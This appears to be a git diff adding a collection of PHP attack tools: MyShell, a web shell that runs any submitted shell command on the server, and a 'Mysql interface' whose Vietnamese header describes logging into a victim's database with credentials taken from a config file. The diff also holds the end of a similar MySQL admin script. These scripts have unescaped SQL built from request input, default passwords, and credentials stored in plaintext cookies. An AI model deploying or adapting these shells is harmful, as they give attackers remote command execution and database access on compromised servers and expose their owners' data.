+		$field = mysql_fetch_field( $pResult, $i );
+		if( $field->primary_key == 1 )
+			if( $field->numeric == 1 )
+				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+			else
+				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+	}
+	$key = substr( $key, 0, strlen($key)-4 );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	$queryStr =  "DELETE FROM $tablename WHERE $key";
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function dump() {
+	global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+	if( $action == "dumpTable" )
+		$filename = $tablename;
+	else
+		$filename = $dbname;
+
+	header("Content-disposition: filename=$filename.sql");
+	header("Content-type: application/octetstream");
+	header("Pragma: no-cache");
+	header("Expires: 0");
+
+	$pResult = mysql_query( "show variables" );
+	while( 1 ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		if( $rowArray[0] == "basedir" )
+			$bindir = $rowArray[1]."bin/";
+	}
+
+	passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD 
+$dbname 
+$tablename" );
+}
+
+function utils() {
+	global $PHP_SELF, $command;
+	echo "<h1>Utilities</h1>\n";
+	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+		echo "<hr>\n";
+		echo "Show\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+		echo "</ul>\n";
+		echo "Flush\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+		if( $command == "flush_hosts" ) {
+			if( mysql_query( "Flush hosts" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+		if( $command == "flush_logs" ) {
+			if( mysql_query( "Flush logs" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+		if( $command == "flush_privileges" ) {
+			if( mysql_query( "Flush privileges" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+		if( $command == "flush_tables" ) {
+			if( mysql_query( "Flush tables" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+		if( $command == "flush_status" ) {
+			if( mysql_query( "Flush status" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "</ul>\n";
+	} else {
+		$queryStr = ereg_replace( "_", " ", $command );
+		$pResult = mysql_query( $queryStr );
+		if( $pResult == false ) {
+			echo "Fail";
+			return;
+		}
+		$col = mysql_num_fields( $pResult );
+
+		echo "<p class=location>$queryStr</p>\n";
+		echo "<hr>\n";
+
+		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+		echo "<tr>\n";
+		for( $i = 0; $i < $col; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			echo "<th>".$field->name."</th>\n";
+		}
+		echo "</tr>\n";
+
+		while( 1 ) {
+			$rowArray = mysql_fetch_row( $pResult );
+			if( $rowArray == false ) break;
+			echo "<tr>\n";
+			for( $j = 0; $j < $col; $j++ )
+				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+			echo "</tr>\n";
+		}
+		echo "</table>\n";
+	}
+}
+
+function header_html() {
+	global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+	color: #11bb33;
+	font-size: small;
+}
+h1 {
+	color: #A4A260;
+}
+th {
+	background-color: #BDBE42;
+	color: #FFFFFF;
+	font-size: x-small;
+}
+td {
+	background-color: #DEDFA5;
+	font-size: x-small;
+}
+form {
+	margin-top: 0;
+	margin-bottom: 0;
+}
+a {
+	text-decoration:none;
+	color: #848200;
+	font-size:x-small;
+}
+a:link {
+}
+a:hover {
+	background-color:#EEEFD5;
+	color:#646200;
+	text-decoration:none
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+	echo "<hr>\n";
+	echo "<font size=2>\n";
+	echo "<font color=blue>[$USERNAME]</font> - \n";
+
+	echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+	if( $tablename != "" )
+		echo "<a 
+href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table 
+List</a> | ";
+	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+	echo "</font>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+	logon();
+else if( $action == "logon_submit" )
+	logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	dump();
+} else {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	echo "<!--";
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	echo "-->";
+
+	if( $mysqlHandle == false ) {
+		echo "<html>\n";
+		echo "<head>\n";
+		echo "<title>MySQL Web Interface</title>\n";
+		echo "</head>\n";
+		echo "<body>\n";
+		echo "<table width=100% height=100%><tr><td><center>\n";
+		echo "<h1>Wrong Password!</h1>\n";
+		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+		echo "</center></td></tr></table>\n";
+		echo "</body>\n";
+		echo "</html>\n";
+	} else {
+		header_html();
+		if( $action == "listDBs" )
+			listDatabases();
+		else if( $action == "createDB" )
+			createDatabase();
+		else if( $action == "dropDB" )
+			dropDatabase();
+		else if( $action == "listTables" )
+			listTables();
+		else if( $action == "createTable" )
+			createTable();
+		else if( $action == "dropTable" )
+			dropTable();
+		else if( $action == "viewSchema" )
+			viewSchema();
+		else if( $action == "query" )
+			viewData( $queryStr );
+		else if( $action == "addField" )
+			manageField( "add" );
+		else if( $action == "addField_submit" )
+			manageField_submit( "add" );
+		else if( $action == "editField" )
+			manageField( "edit" );
+		else if( $action == "editField_submit" )
+			manageField_submit( "edit" );
+		else if( $action == "dropField" )
+			dropField();
+		else if( $action == "viewData" )
+			viewData( "" );
+		else if( $action == "addData" )
+			manageData( "add" );
+		else if( $action == "addData_submit" )
+			manageData_submit( "add" );
+		else if( $action == "editData" )
+			manageData( "edit" );
+		else if( $action == "editData_submit" )
+			manageData_submit( "edit" );
+		else if( $action == "deleteData" )
+			deleteData();
+		else if( $action == "utils" )
+			utils();
+
+		mysql_close( $mysqlHandle);
+		footer_html();
+	}
+}
+
+?>
diff --git a/php/MyShell.php b/php/MyShell.php
new file mode 100644
index 0000000..eb80073
--- /dev/null
+++ b/php/MyShell.php
@@ -0,0 +1,304 @@
+<?php
+/*
+  **************************************************************
+  *                        MyShell                             *
+  **************************************************************
+  $Id: shell.php,v 1.0.5 2001/09/08 09:28:42 digitart Exp $
+
+  An interactive PHP-page that will execute any command entered.
+  See the files README and INSTALL or http://www.digitart.net  for
+  further information.
+  Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
+  based on the original program phpShell by Martin Geisler
+
+  This program is free software; you can redistribute it and/or
+  modify it under the terms of the GNU General Public License
+  as published by the Free Software Foundation; either version 2
+  of the License, or (at your option) any later version.
+
+  This program is distributed in the hope that it will be useful,
+  but WITHOUT ANY WARRANTY; without even the implied warranty of
+  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+  GNU General Public License for more details.
+
+  You can get a copy of the GNU General Public License from this
+  address: http://www.gnu.org/copyleft/gpl.html#SEC1
+  You can also write to the Free Software Foundation, Inc., 59 Temple
+  Place - Suite 330, Boston, MA  02111-1307, USA.
+*/
+
+
+#$selfSecure Enable auto authenticate feature. This must be 0 in order to
+#use .htaccess file to control access to MyShell, otherwise let it as 1
+#and set up your user and password using $shellUser and $shellPswd.
+#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
+#ACCESS TO THE SCRIPT.
+
+$selfSecure = 1;
+$shellUser  = "root";
+$shellPswd  = "myshell";
+
+#$adminEmail is the email address to send warning notifications in case
+#someone tries to access the script and fails to provide correct user and
+#password. This only works if you have $selfSecure enabeled.
+
+$adminEmail = "youremail@yourserver.com";
+
+#$fromEmail is the email address warning messages are sended from.
+#This is set for default to the server admin, but you can change
+#to any address you want i.e.: noreplay@yourdomain.com
+#This only works if you have $selfSecure enabeled.
+
+$fromEmail  = $HTTP_SERVER_VARS["SERVER_ADMIN"];
+
+#$dirLimit is the top directory allowed to change to using cd command
+#or the form selector. Any attempt to change to a directory up this
+#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
+#It is a good practice to set it to $DOCUMENT_ROOT using:
+#$dirLimit = $DOCUMENT_ROOT;
+#If you want to have access to all server directories leave it blank.
+#WARNING: Althought a user won't be able to snoop on directories above
+#this level using MyShell, he/she will still be able to excecute
+#commands on any directory where Webserver has permisson,
+#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
+
+$dirLimit = "";
+
+#$autoErrorTrap Enable automatic error traping if command returns error.
+#Bear in mind that MyShell executes the command again in order to
+#trap the stderr. This shouldn't be a problem in most cases.
+#If you turn it off, you'll have to select to trap stderr or not for
+#every command you excecute.
+
+$autoErrorTrap = 1;
+
+#Cosmetic defaults.
+
+$termCols     = 80;            //Default width of the output text area
+$termRows     = 20;            //Default heght of the output text area
+$bgColor      = "#000000";     //background color
+$bgInputColor = "#333333";     //color of the input field
+$outColor     = "#00BB00";     //color of the text output from the server
+$textColor    = "#009900";     //color of the hard texts of the terminal
+$linkColor    = "#00FF00";     //color of the links
+
+/************** No customize needed from this point *************/
+
+$MyShellVersion = "MyShell 1.0.5 build 20010910";
+if($selfSecure){
+    if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
+       Header('WWW-Authenticate: Basic realm="MyShell"');
+       Header('HTTP/1.0 401 Unauthorized');
+       echo "<html>
+         <head>
+         <title>MyShell error - Access Denied</title>
+         </head>
+         <h1>Access denied</h1>
+         A warning message have been sended to the administrator
+         <hr>
+         <em>$MyShellVersion</em>";
+       if(isset($PHP_AUTH_USER)){
+          $warnMsg ="
+ This is $MyShellVersion
+ installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
+ just to let you know that somebody tryed to access
+ the script using wrong username or password:
+ 
+ Date: ".date("Y-m-d H:i:s")."
+ IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
+ User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
+ username used: $PHP_AUTH_USER
+ password used: $PHP_AUTH_PW
+ 
+ If this is not the first time it happens,
+ please consider either to remove MyShell
+ from your system or change it's name or
+ directory location on your server.
+ 
+ Regards
+ The MyShell dev team
+       ";
+          mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
+          "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
+       }
+       exit;
+    }
+}
+
+if(!$oCols)$oCols=$termCols;
+if(!$oRows)$oRows=$termRows;
+?>
+<html>
+<head>
+<title>MyShell</title>
+<style>
+body{
+	background-color: <?echo $bgColor ?>;
+	font-family : sans-serif;
+	font-size : 10px;
+	scrollbar-face-color: #666666;
+	scrollbar-shadow-color:  <?echo $bgColor ?>;
+	scrollbar-highlight-color: #999999;
+	scrollbar-3dlight-color:  <?echo $bgColor ?>;
+	scrollbar-darkshadow-color:  <?echo $bgColor ?>;
+	scrollbar-track-color:  <?echo $bgInputColor ?>;
+	scrollbar-arrow-color:  <?echo $textColor ?>;
+}
+input,select,option{
+	background-color: <?echo $bgInputColor ?>;
+	color : <?echo $outColor ?>;
+	border-style : none;
+	font-size : 10px;
+}
+textarea{
+	background-color: <?echo $bgColor ?>;
+	color : <?echo $outColor ?>;
+	border-style : none;
+}
+</style>
+</head>
+<body bgcolor=<?echo $bgColor ?> TEXT=<?echo $textColor ?> LINK=<?echo $linkColor ?> VLINK=<?echo $linkColor ?> onload=document.shell.command.select()>
+<?php
+// First we check if there has been asked for a working directory.
+if (isset($work_dir)) {
+  //A workdir has been asked for - we chdir to that dir.
+  $work_dir = validate_dir($work_dir);
+  @chdir($work_dir) or
+      ($dirError = "Can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
+  $work_dir = exec("pwd");
+}
+else{
+  /* No work_dir - we chdir to $DOCUMENT_ROOT */
+  $work_dir = validate_dir($DOCUMENT_ROOT);
+  chdir($work_dir);
+  $work_dir = exec("pwd");
+}
+
+//Handling cd command
+$cdPos = strpos($command,"cd ");
+if ((string)$cdPos != "") {
+    $cdPos=$cdPos+3;
+    $path = substr($command,$cdPos);
+    if ($path==".."){
+         $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
+         if ($work_dir == "") $work_dir = "/";
+    }
+    elseif (substr($path,0,1)=="/")$work_dir=$path;
+    else $work_dir=$work_dir."/".$path;
+    $work_dir = validate_dir($work_dir);
+    @chdir($work_dir) or ($dirError = "Can't change directory. Directory does not exist or permission denied");
+    $work_dir = exec("pwd");
+    $commandBk = $command;
+    $command = "";
+}
+?>
+
+<form name="shell" method="post">
+Current working directory: <b>
+<?
+$work_dir_splitted = explode("/", substr($work_dir, 1));
+echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
+if ($work_dir_splitted[0] == "") {
+  $work_dir = "/";  /* Root directory. */
+}
+else{
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    /*  echo "i = $i";*/
+    $url .= "/".$work_dir_splitted[$i];
+    echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/";
+  }
+}
+?>
+</b>
+<br>
+<textarea cols="<? echo $oCols ?>" rows="<? echo $oRows ?>" readonly>
+<?
+echo $dirError;
+if ($command) {
+  if ($stderr) {
+    system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+  elseif (substr($command,0,3) == "man"){
+      exec($command,$man);
+      $rows=count($man);
+      $codes = ".".chr(8);
+      $manual = "";
+      for ($i=0;$i<$rows;$i++){
+          $manual.=$man[$i]."\n";
+      }
+      echo ereg_replace($codes,"",$manual);
+  }
+  else {
+    $ok = system($command,$status);
+    if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+}
+if ($commandBk) $command = $commandBk;
+?>
+</textarea>
+<br>
+<br>
+Command:
+<input type="text" name="command" size="80" <? if ($command && $echoCommand) { echo "value=\"$command\"";} ?> > <input name="submit_btn" type="submit" value="Go!">
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+<?
+if ($autoErrorTrap) echo "Auto error traping enabled";
+else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
+?>
+<br>Working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == ".") {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == "..") {
+      /* We have found the parent dir. We must be carefull if the parent
+         directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+        /* work_dir is only 1 charecter - it can only be / */
+      } elseif (strrpos($work_dir, "/") == 0) {
+        /* The last / in work_dir were the first charecter.
+           This means that we have a top-level directory
+           eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+         directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == "/") {
+        echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+        echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+  closedir($dir_handle);
+?>
+</select>
+&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
+&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
+&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
+&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a>
+</form>
+</body>
+</html>
+<?
+function validate_dir($dir){
+    GLOBAL $dirLimit;
+    if($dirLimit){
+        $cdPos = strpos($dir,$dirLimit);
+        if ((string)$cdPos == "") {
+            $dir = $dirLimit;
+            $GLOBALS["dirError"] = "You are not allowed change to directories above $dirLimit\n";
+        }
+    }
+    return $dir;
+}
+?>
diff --git a/php/Mysql interface v1.0.php b/php/Mysql interface v1.0.php
new file mode 100644
index 0000000..f20dbc4
--- /dev/null
+++ b/php/Mysql interface v1.0.php	
@@ -0,0 +1,1166 @@
+<?
+/*
+* Mysql interface v1.0
+* -------------------------------
+* Description :
+* Dung` de login vao` CSDL cua victim khi da biet user va` pass cua mysql thong qua file config
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+global $PHP_SELF;
+
+setcookie( "mysql_web_admin_username" );
+setcookie( "mysql_web_admin_password" );
+echo "<html>\n";
+echo "<head>\n";
+echo "<title>Mysql interface</title>\n";
+echo "</head>\n";
+echo "<body>\n";
+echo "<table width=100% height=100%><tr><td><center>\n";
+echo "<table cellpadding=2><tr><td bgcolor=#0090FF><center>\n";
+echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+echo "<h1><b><font color=#FF0000>Mysql Interface v1.0</font></b></h1>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=logon_submit>\n";
+echo "<table cellpadding=5 cellspacing=1>\n";
+echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+echo "</table><p>\n";
+echo "<input type=submit value='Enter'>\n";
+echo "<input type=reset value='Clear'><br>\n";
+echo "</form>\n";
+echo "</center></td></tr></table>\n";
+echo "</center></td></tr></table>\n";
+echo "<p><hr width=300>\n";
+echo "<font size=2>\n";
+echo "Copyright &copy; 2005\n <br>";
+echo "</font>\n";
+echo "</center></td></tr></table>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+function logon_submit() {
+global $username, $password, $PHP_SELF;
+
+setcookie( "mysql_web_admin_username", $username );
+setcookie( "mysql_web_admin_password", $password );
+echo "<html>";
+echo "<head>";
+echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+echo "</head>";
+echo "</html>";
+}
+
+function echoQueryResult() {
+global $queryStr, $errMsg;
+
+if( $errMsg == "" ) $errMsg = "Success";
+if( $queryStr != "" ) {
+  echo "<table cellpadding=5>\n";
+  echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+  echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+  echo "</table><p>\n";
+}
+}
+
+function listDatabases() {
+global $mysqlHandle, $PHP_SELF;
+
+echo "<h1>Database List</h1>\n";
+
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createDB>\n";
+echo "<input type=text name=dbname>\n";
+echo "<input type=submit value='Create Database'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+$pDB = mysql_list_dbs( $mysqlHandle );
+$num = mysql_num_rows( $pDB );
+for( $i = 0; $i < $num; $i++ ) {
+  $dbname = mysql_dbname( $pDB, $i );
+  echo "<tr>\n";
+  echo "<td>$dbname</td>\n";
+  echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function createDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_create_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function dropDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_drop_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function listTables() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+echo "<h1>Table List</h1>\n";
+echo "<p class=location>$dbname</p>\n";
+echoQueryResult();
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createTable>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text name=tablename>\n";
+echo "<input type=submit value='Create Table'>\n";
+echo "</form>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=query>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text size=40 name=queryStr>\n";
+//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+echo "<input type=submit value='Query'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+$pTable = mysql_list_tables( $dbname );
+
+if( $pTable == 0 ) {
+  $msg  = mysql_error();
+  echo "<h3>Error : $msg</h3><p>\n";
+  return;
+}
+$num = mysql_num_rows( $pTable );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $tablename = mysql_tablename( $pTable, $i );
+
+  echo "<tr>\n";
+  echo "<td>\n";
+  echo "$tablename\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+  echo "</td>\n";
+  echo "</tr>\n";
+}
+
+echo "</table>";
+}
+
+function createTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "CREATE TABLE $tablename ( no INT )";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function dropTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "DROP TABLE $tablename";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function viewSchema() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+echo "<h1>Table Schema</h1>\n";
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echoQueryResult();
+
+echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
+echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
+echo "<hr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+echo "<tr>\n";
+echo "<th>Field</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Null</th>\n";
+echo "<th>Key</th>\n";
+echo "<th>Default</th>\n";
+echo "<th>Extra</th>\n";
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  echo "<tr>\n";
+  echo "<td>".$field["Field"]."</td>\n";
+  echo "<td>".$field["Type"]."</td>\n";
+  echo "<td>".$field["Null"]."</td>\n";
+  echo "<td>".$field["Key"]."</td>\n";
+  echo "<td>".$field["Default"]."</td>\n";
+  echo "<td>".$field["Extra"]."</td>\n";
+  $fieldname = $field["Field"];
+  echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Field</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Field</h1>\n";
+  $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+  $num = mysql_num_rows( $pResult );
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  if( $field["Field"] == $fieldname ) {
+    $fieldtype = $field["Type"];
+    $fieldkey = $field["Key"];
+    $fieldextra = $field["Extra"];
+    $fieldnull = $field["Null"];
+    $fielddefault = $field["Default"];
+    break;
+  }
+  }
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( strpos( $fieldtype, "(" ) ) {
+  if( $type == "enum" | $type == "set" ) {
+    $valuelist = strtok( " ()\n" );
+  } else {
+    $M = strtok( " (,)\n" );
+    if( strpos( $fieldtype, "," ) )
+    $D = strtok( " (,)\n" );
+  }
+  }
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+echo "<form action=$PHP_SELF>\n";
+
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addField_submit>\n";
+else if( $cmd == "edit" ) {
+  echo "<input type=hidden name=action value=editField_submit>\n";
+  echo "<input type=hidden name=old_name value=$fieldname>\n";
+}
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+
+echo "<h3>Name</h3>\n";
+echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
